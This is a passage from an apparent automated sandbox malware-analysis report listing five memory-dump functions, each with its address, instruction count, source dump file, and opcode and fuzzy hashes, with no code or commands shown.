                                                    • Source File: 0000000A.00000002.1938009179.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7450000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ad763c3efd385e52867dab0f55b57067def3d248e21f1559dfbf0762ff2245b2
                                                    • Instruction ID: a9889f4f98a295db2bcc92f1f59f75a34f8116c306c0c0a6d136a3f1ecae2b53
                                                    • Opcode Fuzzy Hash: ad763c3efd385e52867dab0f55b57067def3d248e21f1559dfbf0762ff2245b2
                                                    • Instruction Fuzzy Hash: ABF01576E0010DEFCB01DFA4D8489CDFBB2EB58205F2082EAD809A2205E6315B62CB81
                                                    Function 07454FFE Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1938009179.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7450000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d5d1766b27978dd622fb436f19c893155e122dcfd071a9b70b69a219a11c316
                                                    • Instruction ID: ff800fdc3a44622e40451a6cd3f80918ed3a4c9299aff3808aa689512e3f82c8
                                                    • Opcode Fuzzy Hash: 7d5d1766b27978dd622fb436f19c893155e122dcfd071a9b70b69a219a11c316
                                                    • Instruction Fuzzy Hash: 08E01A71610015CFCB00DF69E4487E873F1FB88256F4140A6E405DB2A1DB759996CB90
                                                    Function 074542E0 Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1938009179.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7450000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cd3dbb63cedf6d976ae04a30c30bc93d48e669ddacb8608d75fcd04b56bc031c
                                                    • Instruction ID: bcf1c26906e0489af56b8a7703f97e7fc430667df7934bef59d5000487edb6e1
                                                    • Opcode Fuzzy Hash: cd3dbb63cedf6d976ae04a30c30bc93d48e669ddacb8608d75fcd04b56bc031c
                                                    • Instruction Fuzzy Hash: 28D05E76249244AFDB41EAE0C845E867F229F28210F14D15AF9499F562C6B28567CB01
                                                    Function 0745A3B8 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1938009179.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7450000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d20e475e1251372e50b2def15f717f90b4c66c14445597bec5e5906569540fce
                                                    • Instruction ID: 7e86622e3b7db7147f56efe6963a8f7cc877d3943ca210c3be9dafde53b2e614
                                                    • Opcode Fuzzy Hash: d20e475e1251372e50b2def15f717f90b4c66c14445597bec5e5906569540fce
                                                    • Instruction Fuzzy Hash: C4D01270240204DFC700DB68EA84852BBA8EF49708318C2B9E0088F333DB72EC42CA90
                                                    Function 074542F0 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1938009179.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7450000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0c30ca0592fae659dfac6d7d14b742f015e104f2ce41eb22169bfa6c29e1f4a7
                                                    • Instruction ID: fb827c5ecb4fdaeeb614e20bc634d619504341218c3b124d7518c2409856c1f6
                                                    • Opcode Fuzzy Hash: 0c30ca0592fae659dfac6d7d14b742f015e104f2ce41eb22169bfa6c29e1f4a7
                                                    • Instruction Fuzzy Hash: DFC08C3A300208BFDB80AFD4C840D96776DAB18710F50D000FA080F202C2B2E862DBA0